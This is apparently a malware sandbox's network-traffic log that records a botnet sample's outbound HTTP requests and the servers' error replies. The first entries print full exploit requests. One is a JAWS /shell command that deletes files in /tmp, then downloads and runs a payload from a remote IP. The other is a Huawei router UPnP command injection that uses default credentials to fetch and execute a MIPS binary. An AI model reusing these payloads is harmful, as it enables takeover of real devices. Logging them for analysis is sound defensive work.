      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
      Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 33 2e 31 32 33 2e 38 35 2e 31 34 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 93.123.85.149 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Fri, 26 Jan 2024 08:31:00 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:01 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:31:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:04 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.4.1Date: Fri, 26 Jan 2024 14:31:12 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.4.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:13 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:17 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:31:18 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:27:04 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:22 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:23 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Fri, 26 Jan 2024 14:31:23 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 26 Jan 2024 14:31:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:30 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:30 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:31:33 GMTServer: Apache/2.4.7 (Ubuntu)Content-Length: 277Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:31:33 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Content-Length: 393Date: Fri, 26 Jan 2024 14:31:36 GMTServer: lighttpd/1.4.59Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 0a 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 0a 20 20 20 20 20 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 54 49 54 4c 45 3e 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 2f 48 45 41 44 3e 0a 20 20 20 20 3c 42 4f 44 59 3e 0a 20 20 20 20 20 20 20 20 3c 48 31 3e 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 20 20 3c 50 52 45 3e 3c 2f 50 52 45 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML lang="en-US" dir="ltr" class="ltr"> <HEAD> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE>404 page not found</TITLE> </HEAD> <BODY> <H1>404 page not found</H1> <PRE></PRE> </BODY></HTML>
